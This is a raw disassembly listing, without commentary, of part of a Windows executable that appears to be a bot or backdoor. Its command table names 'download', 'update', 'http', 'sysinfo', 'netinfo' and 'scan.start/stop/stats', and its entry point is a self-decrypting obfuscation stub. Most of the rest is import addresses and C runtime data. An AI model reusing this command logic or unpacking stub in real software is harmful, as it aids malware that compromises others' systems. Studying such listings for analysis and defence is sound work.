xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BA8
jmp sub_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C348: ; DATA XREF: sub_40177B+5�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BD8
jmp sub_40428E
; =============== S U B R O U T I N E =======================================
sub_41C370 proc near ; DATA XREF: .rdata:0041D28C�o
call sub_401291
and dword_433C44, 0
push offset loc_41C498
mov dword_433C40, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C38D: ; DATA XREF: .rdata:0041D290�o
call sub_40172D
and dword_433C50, 0
push offset sub_41C4E1
mov dword_433C4C, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C3AA: ; DATA XREF: .rdata:0041D294�o
push esi
push offset aDownload ; "download"
mov esi, offset off_433C58
call sub_41BB84
mov off_433C58, offset off_420AE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3C6: ; DATA XREF: .rdata:0041D298�o
push esi
push offset aUpdate ; "update"
mov esi, offset off_433C54
call sub_41BB84
mov off_433C54, offset off_420AEC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3E2: ; DATA XREF: .rdata:0041D29C�o
push esi
push offset aHttp ; "http"
mov esi, offset off_433C5C
call sub_41BB84
mov off_433C5C, offset off_420B04
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3FE: ; DATA XREF: .rdata:0041D2A0�o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset off_433C60
call sub_41BB84
mov off_433C60, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C41A: ; DATA XREF: .rdata:0041D2A4�o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset off_433C64
call sub_41BB84
mov off_433C64, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: .rdata:0041D2A8�o
mov eax, dword_424644
add eax, 6
mov dword_433C68, eax
retn
; ---------------------------------------------------------------------------
loc_41C444: ; DATA XREF: .rdata:0041D2AC�o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset off_433C74
call sub_41BB84
mov off_433C74, offset off_420D1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C460: ; DATA XREF: .rdata:0041D2B0�o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset off_433C6C
call sub_41BB84
mov off_433C6C, offset off_420D24
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C47C: ; DATA XREF: .rdata:0041D2B4�o
push esi
push offset aScan_stats ; "scan.stats"
mov esi, offset off_433C70
call sub_41BB84
mov off_433C70, offset off_420D2C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C498: ; DATA XREF: sub_41C370+C�o
mov eax, dword_433C40
mov ecx, [eax]
mov [eax], eax
mov eax, dword_433C40
mov [eax+4], eax
and dword_433C44, 0
cmp ecx, dword_433C40
jz short loc_41C4CD
push esi
loc_41C4B9: ; CODE XREF: sub_41C370+15A�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, dword_433C40
pop ecx
mov ecx, esi
jnz short loc_41C4B9
pop esi
loc_41C4CD: ; CODE XREF: sub_41C370+146�j
push dword_433C40
call sub_402F6D
and dword_433C40, 0
pop ecx
retn
sub_41C370 endp
; =============== S U B R O U T I N E =======================================
sub_41C4E1 proc near ; DATA XREF: sub_41C370+29�o
mov eax, dword_433C4C
mov ecx, [eax]
mov [eax], eax
mov eax, dword_433C4C
mov [eax+4], eax
and dword_433C50, 0
cmp ecx, dword_433C4C
jz short loc_41C516
push esi
loc_41C502: ; CODE XREF: sub_41C4E1+32�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, dword_433C4C
pop ecx
mov ecx, esi
jnz short loc_41C502
pop esi
loc_41C516: ; CODE XREF: sub_41C4E1+1E�j
push dword_433C4C
call sub_402F6D
and dword_433C4C, 0
pop ecx
retn
sub_41C4E1 endp
; ---------------------------------------------------------------------------
loc_41C52A: ; DATA XREF: sub_40304B+40�o
mov dword_425A84, offset off_41D314
mov ecx, offset dword_425A84
jmp sub_402CCA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_41C550
call sub_41C5EA
jmp loc_41C59B
start endp
; =============== S U B R O U T I N E =======================================
sub_41C550 proc near ; CODE XREF: start+3�p
arg_0 = byte ptr 4
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push eax
push 80h
push eax
push eax
push eax
push 80000000h
push 200h
push eax
push eax
push 80000000h
call ds:dword_41D060 ; GetModuleFileNameA
xor eax, eax
push eax
push 80000000h
push 80000000h
push eax
push eax
push eax
push 80000000h
push eax
push eax
call ds:dword_41D060 ; GetModuleFileNameA
loc_41C59B: ; CODE XREF: start+D�j
sub eax, eax
loc_41C59D: ; CODE XREF: sub_41C550+53�j
dec al
or al, al
jz short loc_41C5A7
jnz short loc_41C59D
jmp short near ptr 41C60Eh
; ---------------------------------------------------------------------------
loc_41C5A7: ; CODE XREF: sub_41C550+51�j
call sub_41C5E6
add edx, 19A54h
push edx
sub ecx, ecx
or ecx, 24F5h
mov esi, 2Eh
loc_41C5C0: ; CODE XREF: sub_41C550+7E�j
xchg al, [edx]
sub ax, si
xchg al, [edx]
inc edx
inc esi
sub ecx, 1
or ecx, ecx
jnz short loc_41C5C0
pop edx
mov esp, fs:0
pop dword ptr fs:0
lea ebp, [esp+arg_0]
leave
jmp edx
sub_41C550 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_41C5E6 proc near ; CODE XREF: sub_41C550:loc_41C5A7�p
pop edx
push edx
retn
sub_41C5E6 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_41C5EA proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_41C5EA endp ; sp-analysis failed
_text ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00005852 ( 22610.)
; Section size in file : 00005852 ( 22610.)
; Offset to raw data for section: 0001D000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 41D000h
dword_41D000 dd 77DD5C55h ; DATA XREF: sub_416F32+39�r
dword_41D004 dd 77DD590Bh ; DATA XREF: sub_416E5F+1D�r
; sub_416F32+1B�r
dword_41D008 dd 77DD23D7h ; DATA XREF: sub_416ECD+31�r
dword_41D00C dd 77DD59F0h ; DATA XREF: sub_416E5F+52�r
dword_41D010 dd 77DD189Ah ; DATA XREF: sub_416E5F+2A�r
; sub_416E5F+60�r ...
dword_41D014 dd 77DDA595h ; DATA XREF: sub_419835+3C�r
dword_41D018 dd 77DD81E3h ; DATA XREF: sub_419C6D+A5�r
; sub_419C6D+1B6�r
dword_41D01C dd 77DE1291h ; DATA XREF: sub_419760+82�r
dword_41D020 dd 77DD7F3Eh ; DATA XREF: sub_419A9F+132�r
dword_41D024 dd 77DDA20Bh ; DATA XREF: sub_419C1D+C�r
dword_41D028 dd 77E2B9D2h ; DATA XREF: sub_419760+24�r
dword_41D02C dd 77DD22EAh ; DATA XREF: sub_416ECD+14�r
; sub_419A9F+90�r ...
dword_41D030 dd 77DE7B47h ; DATA XREF: sub_419EA0+299�r
dword_41D034 dd 77DF7311h ; DATA XREF: sub_419835+19�r
dword_41D038 dd 77DD5CF6h ; DATA XREF: sub_419EA0+27D�r
dword_41D03C dd 77E2C1B3h ; DATA XREF: sub_419C1D+2E�r
dword_41D040 dd 77DDAB2Fh ; DATA XREF: sub_419C1D+3B�r
dword_41D044 dd 77DE801Bh ; DATA XREF: sub_419C1D+1E�r
dword_41D048 dd 77DDACABh ; DATA XREF: sub_401CC0+110�r
align 10h
dword_41D050 dd 77E75CB5h ; DATA XREF: sub_4078A7+E�r
; sub_419477+168�r ...
dword_41D054 dd 77E7513Ch ; DATA XREF: sub_4102B0+22�r
; sub_418E1F+29�r
dword_41D058 dd 77E802FCh ; DATA XREF: sub_40B08A+5D�r
; sub_418DA0+B�r
dword_41D05C dd 77E61BB8h ; DATA XREF: sub_419219+8B�r
dword_41D060 dd 77E7A099h ; DATA XREF: sub_409AB4+99�r
; sub_40AE54+2A�r ...
dword_41D064 dd 77E6D75Bh ; DATA XREF: sub_418DA0+19�r
dword_41D068 dd 77E7C657h ; DATA XREF: .text:00403F86�r
; sub_418E51+24�r ...
dword_41D06C dd 77E7A837h ; DATA XREF: sub_40E072+234�r
; sub_41142B+13�r ...
dword_41D070 dd 77E793EFh ; DATA XREF: sub_418552+31E�r
dword_41D074 dd 77E78C81h ; DATA XREF: sub_40CCBE+40�r
; sub_41075B+2D�r ...
dword_41D078 dd 77E78B82h ; DATA XREF: sub_409DAD+17F�r
; sub_409DAD+2A3�r ...
dword_41D07C dd 77E79D5Bh ; DATA XREF: sub_4140AB+5E�r
; sub_41A9DE+6CD�r ...
dword_41D080 dd 77E6BD13h ; DATA XREF: .text:0041BD99�r
dword_41D084 dd 77E7C2C4h ; DATA XREF: .text:0041BED8�r
dword_41D088 dd 77E79D8Ch ; DATA XREF: sub_409AB4+194�r
; sub_40CE5A+212�r ...
dword_41D08C dd 77E73C49h ; DATA XREF: sub_41B3D0+20�r
; sub_41B5D2+43�r
dword_41D090 dd 77E72E92h ; DATA XREF: sub_402E3D+AA�r
; sub_40468E+B9�r ...
dword_41D094 dd 77E75CEBh ; DATA XREF: sub_414023+8�r
dword_41D098 dd 77E76C1Ah ; DATA XREF: sub_401CC0+B3�r
dword_41D09C dd 77E737DEh ; DATA XREF: sub_41A9DE+63F�r
dword_41D0A0 dd 77E77CCEh ; DATA XREF: sub_409DAD+3E7�r
; sub_40BF57:loc_40C004�r ...
dword_41D0A4 dd 77E74672h ; DATA XREF: sub_41A5C1+2C3�r
dword_41D0A8 dd 77E70192h ; DATA XREF: sub_4105A7+14C�r
dword_41D0AC dd 77E76052h ; DATA XREF: sub_4104DC+45�r
dword_41D0B0 dd 77E795BFh ; DATA XREF: sub_4104DC+78�r
dword_41D0B4 dd 77E99078h ; DATA XREF: sub_4104DC+9B�r
dword_41D0B8 dd 77E73FF9h ; DATA XREF: sub_40F04F+8C�r
dword_41D0BC dd 77E7FF2Eh ; DATA XREF: sub_40EC7F:loc_40ECD3�r
; sub_40ECFC:loc_40ED54�r
dword_41D0C0 dd 77E79824h ; DATA XREF: sub_4195EC+39�r
dword_41D0C4 dd 77E7C4B7h ; DATA XREF: sub_4195EC+50�r
dword_41D0C8 dd 77E79E4Bh ; DATA XREF: sub_4195EC+6F�r
dword_41D0CC dd 77E79C90h ; DATA XREF: sub_402E3D+D9�r
; sub_40468E+F5�r ...
dword_41D0D0 dd 77E73628h ; DATA XREF: sub_419E55+20�r
; .text:0041BE71�r
dword_41D0D4 dd 77E6E154h ; DATA XREF: sub_419948+3B�r
dword_41D0D8 dd 77E98BD8h ; DATA XREF: sub_4199AC+3B�r
dword_41D0DC dd 77E77963h ; DATA XREF: sub_408A4D+4B�r
; sub_40E072+29C�r ...
dword_41D0E0 dd 77E77CC4h ; DATA XREF: sub_40531A+60�r
; sub_4054D6+169�r ...
dword_41D0E4 dd 77E79F93h ; DATA XREF: sub_405127+39�r
; sub_405193+39�r ...
dword_41D0E8 dd 77E805D8h ; DATA XREF: sub_40F524+2D�r
; sub_419677+30�r ...
dword_41D0EC dd 77E7A5FDh ; DATA XREF: sub_405127+49�r
; sub_405193+49�r ...
dword_41D0F0 dd 77F5157Dh ; DATA XREF: sub_403603+79�r
; sub_40531A+2�r ...
dword_41D0F4 dd 77E704FCh ; DATA XREF: sub_401CC0+11F�r
; sub_416F86+D1�r ...
dword_41D0F8 dd 77E616B4h ; DATA XREF: sub_402E3D+E0�r
; sub_40468E+FC�r ...
dword_41D0FC dd 77E61BE6h ; DATA XREF: sub_40773A+1D�r
; sub_40777A+25�r ...
dword_41D100 dd 77E77CB7h ; DATA XREF: .text:00403F61�r
; sub_4105A7+67�r ...
dword_41D104 dd 77E73163h ; DATA XREF: sub_419EA0:loc_41A108�r
dword_41D108 dd 77E7751Ah ; DATA XREF: sub_40B08A+51�r
; sub_41748B+36�r ...
dword_41D10C dd 77F51597h ; DATA XREF: sub_403603+68�r
; .text:00403F96�r ...
dword_41D110 dd 77E7AC37h ; DATA XREF: sub_4140AB+1C�r
; sub_41B5D2+161�r
dword_41D114 dd 77F516F8h ; DATA XREF: sub_4036E0+F�r
; .text:00403F6A�r ...
dword_41D118 dd 77E79540h ; DATA XREF: sub_40CE5A+11D�r
dword_41D11C dd 77EC80CCh ; DATA XREF: sub_40CE5A:loc_40CF93�r
dword_41D120 dd 77E79908h ; DATA XREF: .text:0040CB08�r
dword_41D124 dd 77E7C866h ; DATA XREF: sub_40C33C+2D�r
; sub_40C33C+11C�r
dword_41D128 dd 77E641EBh ; DATA XREF: sub_40C33C+191�r
dword_41D12C dd 77E781F9h ; DATA XREF: sub_40BF57+30�r
; sub_40BF57+144�r ...
dword_41D130 dd 77E77405h ; DATA XREF: sub_40BF57+294�r
; sub_40BF57+365�r
dword_41D134 dd 77E77EE1h ; DATA XREF: sub_40AF0D+B�r
dword_41D138 dd 77E79924h ; DATA XREF: sub_40AF0D:loc_40AF87�r
; sub_40BF57+216�r ...
dword_41D13C dd 77E7C9E1h ; DATA XREF: sub_40AF0D+CC�r
dword_41D140 dd 77E67702h ; DATA XREF: sub_40AF0D:loc_40AFEB�r
dword_41D144 dd 77E9C5B1h ; DATA XREF: sub_40AF0D+10F�r
; sub_40AF0D+126�r
dword_41D148 dd 77E78406h ; DATA XREF: sub_4087E0+12B�r
; sub_4087E0+1C7�r ...
dword_41D14C dd 77E79C3Dh ; DATA XREF: sub_4087E0+1B5�r
; sub_409AB4+169�r
dword_41D150 dd 77E7C931h ; DATA XREF: sub_4087E0+21F�r
dword_41D154 dd 77F5722Fh ; DATA XREF: sub_405E64+27�r
; sub_40DA6D+134�r ...
dword_41D158 dd 77E7980Ah ; DATA XREF: sub_405E64+77�r
; sub_405F14+52�r
dword_41D15C dd 77E79E34h ; DATA XREF: sub_405B50+22F�r
dword_41D160 dd 77E7C726h ; DATA XREF: sub_405A83+11�r
dword_41D164 dd 77E76E0Bh ; DATA XREF: sub_405A83+47�r
dword_41D168 dd 77F7E21Fh ; DATA XREF: sub_4059F7+28�r
; sub_40815B+28�r ...
dword_41D16C dd 77F7E300h ; DATA XREF: sub_40591F+D�r
; sub_4081AD+28�r ...
dword_41D170 dd 77F53275h ; DATA XREF: sub_4058CA+1�r
; sub_40DFD3+62�r
dword_41D174 dd 77F51587h ; DATA XREF: sub_40531A+78�r
; sub_40CB14+AB�r
dword_41D178 dd 77E72B29h ; DATA XREF: sub_405229+2B�r
; sub_4054D6+85�r
dword_41D17C dd 77E79B39h ; DATA XREF: sub_4051FF+23�r
; sub_4054D6+58�r
dword_41D180 dd 77E7C5B4h ; DATA XREF: sub_4051F6�r
; sub_4054D6:loc_405575�r
dword_41D184 dd 77E78B61h ; DATA XREF: sub_405127+7�r
; sub_405193+7�r ...
dword_41D188 dd 77E6C703h ; DATA XREF: sub_404A44+27�r
dword_41D18C dd 77E7A13Fh ; DATA XREF: sub_404A44+4A�r
dword_41D190 dd 77F522F2h ; DATA XREF: sub_402A45+82�r
dword_41D194 dd 77E80656h ; DATA XREF: sub_402AE8�r
; sub_40B08A+41�r
dword_41D198 dd 77EB9A84h ; DATA XREF: sub_402E3D+BE�r
; sub_40468E+D9�r ...
dword_41D19C dd 77E7C9E7h ; DATA XREF: sub_402E3D+B4�r
; sub_40468E+CE�r ...
dword_41D1A0 dd 77E6167Bh ; DATA XREF: sub_403540+9�r
; sub_40B08A+35�r
dword_41D1A4 dd 77E7C938h ; DATA XREF: .text:loc_404045�r
dword_41D1A8 dd 77E6177Ah ; DATA XREF: .text:00403F4C�r
; sub_4087E0+15�r
dword_41D1AC dd 77E6D706h ; DATA XREF: sub_4041BB+40�r
; sub_40F846+222�r
dword_41D1B0 dd 77F6183Eh ; DATA XREF: sub_413976�r
dword_41D1B4 dd 77E7849Fh ; DATA XREF: sub_404816+24�r
; sub_404ABE+56�r ...
dword_41D1B8 dd 77E777EFh ; DATA XREF: sub_4049A0+84�r
; sub_404C69+95�r ...
dword_41D1BC dd 77E778C5h ; DATA XREF: sub_4049A0+59�r
; sub_404C69+76�r ...
dd 0
dword_41D1C4 dd 71B2ACCBh ; DATA XREF: sub_402642�r
dd 0
dword_41D1CC dd 1F7CD927h ; DATA XREF: sub_40263C�r
dword_41D1D0 dd 1F7CB8F8h ; DATA XREF: sub_402636�r
dword_41D1D4 dd 1F7CD214h ; DATA XREF: sub_402630�r
dword_41D1D8 dd 1F7D886Ah ; DATA XREF: sub_40262A�r
dword_41D1DC dd 1F7BA3A9h ; DATA XREF: sub_402624�r
dd 0
dword_41D1E4 dd 77428B97h ; DATA XREF: sub_4190BD+148�r
; sub_41B925+1E3�r
dd 0
dword_41D1EC dd 77D46349h ; DATA XREF: sub_41748B+30�r
dword_41D1F0 dd 77D4DCCCh ; DATA XREF: sub_418C40+67�r
dword_41D1F4 dd 77D4A102h ; DATA XREF: sub_418C40+C�r
dword_41D1F8 dd 77D43DD3h ; DATA XREF: sub_418C40+B1�r
dword_41D1FC dd 77D414D4h ; DATA XREF: sub_418C40+94�r
dword_41D200 dd 77D46F5Bh ; DATA XREF: sub_418AEB+D�r
dword_41D204 dd 77D441F2h ; DATA XREF: sub_418C40+BB�r
dword_41D208 dd 77D44200h ; DATA XREF: sub_418C40+A5�r
dword_41D20C dd 77D47EE5h ; DATA XREF: sub_418C40+4A�r
dd 0
dword_41D214 dd 7620BD61h ; DATA XREF: sub_41B925+EB�r
dword_41D218 dd 76214750h ; DATA XREF: sub_41B925+7D�r
dword_41D21C dd 7620AFB6h ; DATA XREF: sub_41B925+39�r
dd 0
dword_41D224 dd 71AB1A6Dh ; DATA XREF: sub_41397C+98�r
; sub_417F01+117�r ...
dword_41D228 dd 71AB1AF4h ; DATA XREF: sub_4172CC+7D�r
; sub_417361+116�r ...
dword_41D22C dd 71AB60C9h ; DATA XREF: sub_418B1F+FA�r
dword_41D230 dd 71AB5DE2h ; DATA XREF: sub_418B1F+10C�r
dword_41D234 dd 71AB868Dh ; DATA XREF: sub_41835D+1A�r
dword_41D238 dd 71AB157Eh ; DATA XREF: sub_418FC6+34�r
dword_41D23C dd 71AB2BBFh ; DATA XREF: sub_41802F+7B�r
dword_41D240 dd 71AB3E5Dh ; DATA XREF: sub_41397C+78�r
; sub_41802F+DF�r ...
dword_41D244 dd 71AB1836h ; DATA XREF: .text:loc_41C056�r
dword_41D248 dd 71ABF628h ; DATA XREF: sub_418552+4C9�r
dword_41D24C dd 71AB1ED3h ; DATA XREF: sub_41B3D0+F7�r
dword_41D250 dd 71AB3F8Dh ; DATA XREF: sub_41B5D2+58�r
dword_41D254 dd 71AB1746h ; DATA XREF: sub_41B3D0+131�r
; sub_41B3D0+147�r ...
dword_41D258 dd 71AB1890h ; DATA XREF: sub_41397C+8F�r
; sub_41B5D2+F4�r
dword_41D25C dd 71AB1444h ; DATA XREF: sub_41B3D0+11C�r
; sub_41B5D2+12C�r
dword_41D260 dd 71AB401Ch ; DATA XREF: sub_41A9DE+3C�r
; sub_41A9DE+76F�r ...
dword_41D264 dd 71AB12F8h ; DATA XREF: sub_401E82+37�r
dword_41D268 dd 71AB155Ah ; DATA XREF: sub_41397C+54�r
dword_41D26C dd 71AB3ECEh ; DATA XREF: sub_418B1F+D7�r
; sub_41B5D2+9E�r
dword_41D270 dd 71AB5690h ; DATA XREF: sub_417F01+51�r
; sub_418552+85�r
dword_41D274 dd 71AB41DAh ; DATA XREF: .text:0041BF9C�r
dword_41D278 dd 71AB1746h ; DATA XREF: sub_41397C+34�r
; sub_41802F+C7�r ...
dword_41D27C dd 71AB3C22h ; DATA XREF: sub_41397C+20�r
; sub_41802F+2F�r ...
dword_41D280 dd 71ABD755h ; DATA XREF: sub_401E82+48�r
; sub_418552+4F9�r
align 8
dword_41D288 dd 0 ; DATA XREF: sub_407979+49�o
dd offset sub_41C370
dd offset loc_41C38D
dd offset loc_41C3AA
dd offset loc_41C3C6
dd offset loc_41C3E2
dd offset loc_41C3FE
dd offset loc_41C41A
dd offset loc_41C436
dd offset loc_41C444
dd offset loc_41C460
dd offset loc_41C47C
dword_41D2B8 dd 0 ; DATA XREF: sub_407979+50�o
dword_41D2BC dd 0 ; DATA XREF: sub_407979+2D�o
dd offset sub_402DB6
dd offset sub_404E03
dd offset sub_40808A
dd offset sub_40A6DB
dd offset sub_40F839
dd offset sub_40B18A
dword_41D2D8 dd 0 ; DATA XREF: sub_407979+28�o
dword_41D2DC dd 0 ; DATA XREF: sub_407A0B+73�o
dd offset sub_41144A
dd offset sub_40813B
dword_41D2E8 dd 0 ; DATA XREF: sub_407A0B:loc_407A79�o
dword_41D2EC dd 0 ; DATA XREF: sub_407A0B+83�o
dd offset sub_40B1AB
dword_41D2F4 dd 3 dup(0) ; DATA XREF: sub_407A0B:loc_407A89�o
aBadAllocation db 'bad allocation',0 ; DATA XREF: .data:00423000�o
; .data:00423004�o ...
align 10h
dd offset dword_420F64
off_41D314 dd offset sub_401043 ; DATA XREF: sub_401038�o sub_401043+3�o ...
dd offset sub_402CE0
dd offset dword_420F18
off_41D320 dd offset sub_4010C5 ; DATA XREF: sub_401065+20�o
; sub_40109A+A�o ...
dd offset sub_4010B7
dd offset dword_420EC8
off_41D32C dd offset sub_4010EC ; DATA XREF: sub_4010E1�o sub_4010EC+3�o ...
dd offset sub_4010B7
dd offset dword_420D88
off_41D338 dd offset sub_402658 ; DATA XREF: sub_40264D�o sub_402658+3�o ...
dd offset sub_4010B7
aStringTooLong db 'string too long',0 ; DATA XREF: sub_40267A+C�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_4026B9+C�o
dd offset dword_420DD8
off_41D36C dd offset sub_402CED ; DATA XREF: sub_402BFB+A�o
; sub_402C0C+9�o ...
dd offset sub_402CE0
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_402CE0+7�o
align 4
dd offset dword_420DEC
off_41D38C dd offset sub_402FFB ; DATA XREF: sub_402FED+1�o
; .data:off_423008�o ...
oword_41D390 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_403DA0+E3�r
; sub_403DA0+10A�r
oword_41D3A0 xmmword 4330000000000000433h ; DATA XREF: sub_403DA0+46�r
oword_41D3B0 xmmword 0 ; DATA XREF: sub_403DA0:loc_403EA1�r
oword_41D3C0 xmmword 7FFh ; DATA XREF: sub_403DA0+5F�r
dbl_41D3D0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_403DA0:loc_403E9A�r
dword_41D3D8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4041BB+E�o
dd 3, 19930520h, 2 dup(0)
off_41D3F8 dd offset dword_425AA0 ; DATA XREF: sub_40468E+D4�o
dd offset dword_425AF8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
byte_41D480 db 3Dh, 0 ; DATA XREF: .rdata:0041EB90�o
word_41D482 dw 0 ; DATA XREF: sub_40AB84+1B�o
; .rdata:0041EB70�o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_405127+43�o
; sub_405266+2E�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_405127:loc_40515B�o
; sub_405193:loc_4051C7�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_405193+43�o
; sub_405266+42�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_4054D6+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_4054D6+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_4054D6+2A�o
dword_41D4D4 dd 41736C46h ; DATA XREF: sub_4054D6+22�o
byte_41D4D8 db 6Ch ; DATA XREF: sub_4069D7+177�r
db 6Ch, 6Fh, 63h
align 10h
aNull_0: ; DATA XREF: .data:off_423928�o
unicode 0, <(null)>,0
align 10h
aNull db '(null)',0 ; DATA XREF: .data:off_423924�o
align 4
byte_41D4F8 db 6 ; DATA XREF: sub_4069D7:loc_406B60�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707800h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_407881+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_407881�o
aCcs db 'ccs=',0 ; DATA XREF: sub_4081FF+1CC�o
align 4
aUtf8 db 'UTF-8',0 ; DATA XREF: sub_4081FF+1E0�o
align 10h
aUtf16le db 'UTF-16LE',0 ; DATA XREF: sub_4081FF:loc_4083FC�o
align 4
aUnicode db 'UNICODE',0 ; DATA XREF: sub_4081FF:loc_408419�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_423C04�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409AB4+157�o
align 10h
asc_41DB10 db 0Ah ; DATA XREF: sub_409AB4:loc_409BC4�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_409AB4+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_409AB4+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_409AB4+5B�o
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBB8 dd 6E6174h ; DATA XREF: sub_40A42B:loc_40A663�o
dword_41DBBC dd 736F63h ; DATA XREF: sub_40A42B:loc_40A65A�o
